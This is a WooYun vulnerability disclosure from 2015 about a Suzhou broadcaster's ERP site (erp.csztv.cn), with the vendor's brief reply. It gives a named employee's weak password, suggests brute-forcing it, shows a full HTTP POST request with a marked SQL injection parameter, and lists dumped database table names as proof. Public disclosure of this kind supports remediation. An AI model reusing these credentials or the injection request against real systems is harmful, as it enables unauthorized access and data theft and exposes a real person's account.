当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160001

漏洞标题:苏州广电网多处漏洞(弱口令,sql注射)

相关厂商:csztv.cn

漏洞作者: 路人甲

提交时间:2015-12-10 15:33

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-10: 厂商已经确认,细节仅向厂商公开
2015-12-20: 细节向核心白帽子及相关领域专家公开
2015-12-30: 细节向普通白帽子公开
2016-01-09: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

首页!

详细说明:

erp.csztv.cn/member
1.弱口令 王忆军 123456 (可用Burp Suite爆破)
2.注入

2.png


4.png


3.登陆后还有一个地方有注入

5.png


POST /month/postlist1 HTTP/1.1
Host: erp.csztv.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://erp.csztv.cn/month/postlist1
Cookie: Hm_lvt_98e4147c20a2cffc4107c046361c4994=1449727720; Hm_lpvt_98e4147c20a2cffc4107c046361c4994=1449728051; Hm_lvt_8378399f30bddba035547fe89133d31b=1449728052; Hm_lpvt_8378399f30bddba035547fe89133d31b=1449728052; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d4f80148bb216758deba7cf989f12f3c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22171.88.71.28%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A42.0%29+Gecko%2F20100101+Firefox%2F42.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1449729083%3B%7D3f7cc63cb059527639fe2f0267ae5002
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
month=2015-12*&uid=all


漏洞证明:

3.jpg


Database: bang
[76 tables]
+----------------------------+
| adcenter |
| att_daka_detail_his |
| att_daka_his |
| att_leave |
| att_log_his |
| att_members |
| att_task |
| att_train |
| att_train_user |
| att_usertask |
| bang_action_prize |
| bang_candidate |
| bang_capta |
| bang_changelog |
| bang_event |
| bang_group |
| bang_hostip |
| bang_mob_dinfo |
| bang_mob_gg |
| bang_module |
| bang_news |
| bang_node |
| bang_option_his |
| bang_page_option |
| bang_page_option_bak |
| bang_page_option_old |
| bang_page_result |
| bang_page_title |
| bang_phone |
| bang_phone_tamp |
| bang_poll |
| bang_poll_info |
| bang_poll_info_temp |
| bang_poster |
| bang_rank_news |
| bang_rank_trade |
| bang_sessions |
| bang_sign |
| bang_smsinfo |
| bang_smsinfo_back |
| bang_survey |
| bang_tjinfo |
| bang_tjtype |
| bang_user |
| bang_user_action |
| bang_user_group |
| bang_user_group_permission |
| bang_user_permission |
| class |
| contable |
| host13_image |
| host13_news |
| host_image |
| host_news |
| intorder |
| poll_ads |
| poster |
| qauserinfo |
| range |
| test_test |
| torder |
| trade |
| userinfo |
| wy_action |
| wy_capta |
| wy_student |
| wy_vote |
| yd_daka_detail_his |
| yd_daka_his |
| yd_leave |
| yd_log_his |
| yd_members |
| yd_task |
| yd_train |
| yd_train_user |
| yd_usertask |
+----------------------------+

修复方案:

。。。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-12-10 15:35

厂商回复:

系统已经基本不用了,但是还是谢谢提出。

最新状态:

暂无